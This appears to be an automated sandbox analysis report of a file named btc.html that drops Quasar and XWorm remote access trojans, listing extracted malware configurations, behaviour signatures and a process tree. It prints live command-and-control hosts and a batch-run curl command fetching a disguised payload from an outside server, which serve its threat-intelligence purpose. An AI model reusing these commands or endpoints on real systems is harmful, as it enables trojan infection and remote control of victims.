quasar | d16f93e57cac8170ee50e5c50a62c242de0ff7b78d707f218f344c779f30d3c4

Analysis

max time kernel
508s
max time network
602s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
19-11-2024 07:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

btc.html
Size

4KB
MD5

8e8686c27f34f377faca7502ea53d892
SHA1

c0c10d5cf6e829078e2b7ddd8d75f285b20476e6
SHA256

d16f93e57cac8170ee50e5c50a62c242de0ff7b78d707f218f344c779f30d3c4
SHA512

2be3631f86fe9f49986c27cc5ee9f6d2c193c61e1f9257949c90127f8748f13bd2965cac80b62e8da982f643d367a81a5750d5b95210a9e501998b5ce75caa51
SSDEEP

96:1j9jwIjYjUDK/D5DMF+BOiVAZLxuZLqmXSrRU9PaQxJbGD:1j9jhjYjIK/Vo+t6LxuZ2mCry9ieJGD

Score

10^/10

quasar xworm iamnew discovery execution rat spyware trojan

Malware Config

Extracted

Family

xworm

Version

5.0

lovejuice.cc:7005

Mutex

ZlZcGFLUkihvhpyO

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

iamnew

walkout.ddnsgeek.com:8080

Mutex

afaa75be-362d-43d7-90d7-242414a4e4dc

Attributes

encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2292-1019-0x000001B6E0A70000-0x000001B6E0A7E000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/3468-1022-0x000001A09A630000-0x000001A09A954000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 5 IoCs

flow	pid	Process
182	2292	powershell.exe
185	3468	powershell.exe
187	3468	powershell.exe
191	2292	powershell.exe
194	3856	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3856	powershell.exe
2292	powershell.exe
5308	powershell.exe
3468	powershell.exe
3856	powershell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\586f5b9b-e778-4c18-9edb-38c9426b9a07.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241119074739.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings	firefox.exe

NTFS ADS 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\btc.bat:Zone.Identifier	firefox.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 322792.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\Downloads\fgg.bat:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\bt.bat:Zone.Identifier	firefox.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1132	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3124	msedge.exe
3124	msedge.exe
876	msedge.exe
876	msedge.exe
6056	identity_helper.exe
6056	identity_helper.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
5672	powershell.exe
5672	powershell.exe
5672	powershell.exe
5308	powershell.exe
5308	powershell.exe
5308	powershell.exe
3468	powershell.exe
3468	powershell.exe
3468	powershell.exe
3856	powershell.exe
3856	powershell.exe
3856	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2728	firefox.exe
Token: SeDebugPrivilege	2728	firefox.exe
Token: SeDebugPrivilege	2728	firefox.exe
Token: SeDebugPrivilege	2728	firefox.exe
Token: SeDebugPrivilege	2728	firefox.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	5672	powershell.exe
Token: SeIncreaseQuotaPrivilege	5672	powershell.exe
Token: SeSecurityPrivilege	5672	powershell.exe
Token: SeTakeOwnershipPrivilege	5672	powershell.exe
Token: SeLoadDriverPrivilege	5672	powershell.exe
Token: SeSystemProfilePrivilege	5672	powershell.exe
Token: SeSystemtimePrivilege	5672	powershell.exe
Token: SeProfSingleProcessPrivilege	5672	powershell.exe
Token: SeIncBasePriorityPrivilege	5672	powershell.exe
Token: SeCreatePagefilePrivilege	5672	powershell.exe
Token: SeBackupPrivilege	5672	powershell.exe
Token: SeRestorePrivilege	5672	powershell.exe
Token: SeShutdownPrivilege	5672	powershell.exe
Token: SeDebugPrivilege	5672	powershell.exe
Token: SeSystemEnvironmentPrivilege	5672	powershell.exe
Token: SeRemoteShutdownPrivilege	5672	powershell.exe
Token: SeUndockPrivilege	5672	powershell.exe
Token: SeManageVolumePrivilege	5672	powershell.exe
Token: 33	5672	powershell.exe
Token: 34	5672	powershell.exe
Token: 35	5672	powershell.exe
Token: 36	5672	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeIncreaseQuotaPrivilege	5308	powershell.exe
Token: SeSecurityPrivilege	5308	powershell.exe
Token: SeTakeOwnershipPrivilege	5308	powershell.exe
Token: SeLoadDriverPrivilege	5308	powershell.exe
Token: SeSystemProfilePrivilege	5308	powershell.exe
Token: SeSystemtimePrivilege	5308	powershell.exe
Token: SeProfSingleProcessPrivilege	5308	powershell.exe
Token: SeIncBasePriorityPrivilege	5308	powershell.exe
Token: SeCreatePagefilePrivilege	5308	powershell.exe
Token: SeBackupPrivilege	5308	powershell.exe
Token: SeRestorePrivilege	5308	powershell.exe
Token: SeShutdownPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe
Token: SeSystemEnvironmentPrivilege	5308	powershell.exe
Token: SeRemoteShutdownPrivilege	5308	powershell.exe
Token: SeUndockPrivilege	5308	powershell.exe
Token: SeManageVolumePrivilege	5308	powershell.exe
Token: 33	5308	powershell.exe
Token: 34	5308	powershell.exe
Token: 35	5308	powershell.exe
Token: 36	5308	powershell.exe
Token: SeIncreaseQuotaPrivilege	5308	powershell.exe
Token: SeSecurityPrivilege	5308	powershell.exe
Token: SeTakeOwnershipPrivilege	5308	powershell.exe
Token: SeLoadDriverPrivilege	5308	powershell.exe
Token: SeSystemProfilePrivilege	5308	powershell.exe
Token: SeSystemtimePrivilege	5308	powershell.exe
Token: SeProfSingleProcessPrivilege	5308	powershell.exe
Token: SeIncBasePriorityPrivilege	5308	powershell.exe
Token: SeCreatePagefilePrivilege	5308	powershell.exe
Token: SeBackupPrivilege	5308	powershell.exe
Token: SeRestorePrivilege	5308	powershell.exe
Token: SeShutdownPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
876	msedge.exe
2728	firefox.exe
1132	NOTEPAD.EXE

Suspicious use of SendNotifyMessage 20 IoCs

pid	Process
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe

Suspicious use of SetWindowsHookEx 26 IoCs

pid	Process
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
3468	powershell.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe
2728	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 3748 wrote to memory of 2728	3748	firefox.exe	83
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4072	2728	firefox.exe	84
PID 2728 wrote to memory of 4068	2728	firefox.exe	85
PID 2728 wrote to memory of 4068	2728	firefox.exe	85
PID 2728 wrote to memory of 4068	2728	firefox.exe	85
PID 2728 wrote to memory of 4068	2728	firefox.exe	85
PID 2728 wrote to memory of 4068	2728	firefox.exe	85
PID 2728 wrote to memory of 4068	2728	firefox.exe	85
PID 2728 wrote to memory of 4068	2728	firefox.exe	85
PID 2728 wrote to memory of 4068	2728	firefox.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

cURL User-Agent 2 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	129	curl/8.7.1
HTTP User-Agent header	135	curl/8.7.1

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\btc.html"
1⤵
- Suspicious use of WriteProcessMemory
PID:3748
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\btc.html
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1688 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fc00786-098d-4373-8e85-045c21794bc4} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" gpu
    3⤵
    PID:4072
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 24601 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {238f950c-02b9-42c1-8f57-1f6ec1b31ff1} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" socket
    3⤵
    PID:4068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -childID 1 -isForBrowser -prefsHandle 3160 -prefMapHandle 3156 -prefsLen 24742 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e51cc11-69cb-444b-8000-df1630f040c9} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:2784
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1248 -childID 2 -isForBrowser -prefsHandle 4128 -prefMapHandle 2616 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5fddb3c-2f86-490b-90a2-593b0adb30f4} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:4700
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4572 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4604 -prefMapHandle 2744 -prefsLen 29145 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92733418-dc48-4314-a6e0-68d8edda3edf} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" utility
    3⤵
    - Checks processor information in registry
    PID:1964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 3 -isForBrowser -prefsHandle 2756 -prefMapHandle 5240 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8a9f900-4fe5-42ec-b960-2ed38fd581eb} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:3812
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5420 -childID 4 -isForBrowser -prefsHandle 5496 -prefMapHandle 5492 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f847fa13-7860-41a6-9231-d307392cf07c} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:692
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5628 -childID 5 -isForBrowser -prefsHandle 5640 -prefMapHandle 5584 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d96da221-a435-4d65-832e-da6c72ce0ab9} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:2228
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5228 -childID 6 -isForBrowser -prefsHandle 4820 -prefMapHandle 5856 -prefsLen 27777 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9fc4ceef-b2de-4a3a-9ff2-65a10ef3117e} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:4132
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3676 -childID 7 -isForBrowser -prefsHandle 4404 -prefMapHandle 6164 -prefsLen 30629 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {582457e1-0735-4e6f-b3ec-32f9c3c5cbf4} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:2260
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6964 -childID 8 -isForBrowser -prefsHandle 6924 -prefMapHandle 6928 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2e30e02-3642-4ba8-92af-a04db1b1d2de} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:556
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5616 -childID 9 -isForBrowser -prefsHandle 5800 -prefMapHandle 5796 -prefsLen 28338 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26dbb0e7-e41a-4383-9729-8e034a25f932} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:6824
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 10 -isForBrowser -prefsHandle 6760 -prefMapHandle 6104 -prefsLen 28338 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f65df7f7-56b6-4982-9e06-79a93dc63124} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:5308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7264 -childID 11 -isForBrowser -prefsHandle 5484 -prefMapHandle 4488 -prefsLen 28338 -prefMapSize 244658 -jsInitHandle 904 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0213194a-da28-4ff1-a26d-e8220d46822e} 2728 "\\.\pipe\gecko-crash-server-pipe.2728" tab
    3⤵
    PID:4740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\btc.bat" "
1⤵
PID:2204
- C:\Windows\system32\curl.exe
  curl -o "C:\Users\Admin\AppData\Local\Temp\btc.pdf" https://j.hell.ws/gt/btc.jpg
  2⤵
  PID:3340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\btc.pdf
  2⤵
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  PID:876
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x140,0x150,0x7ffa4a9f46f8,0x7ffa4a9f4708,0x7ffa4a9f4718
    3⤵
    PID:400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
    3⤵
    PID:4724
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3108 /prefetch:8
    3⤵
    PID:5164
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
    3⤵
    PID:5428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
    3⤵
    PID:5436
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
    3⤵
    PID:5860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5448 /prefetch:6
    3⤵
    PID:6068
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,16776954870246304525,13916322134311266625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
    3⤵
    PID:6052
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
    3⤵
    - Drops file in Program Files directory
    PID:5596
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff7ddc05460,0x7ff7ddc05470,0x7ff7ddc05480
      4⤵
      PID:5852
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
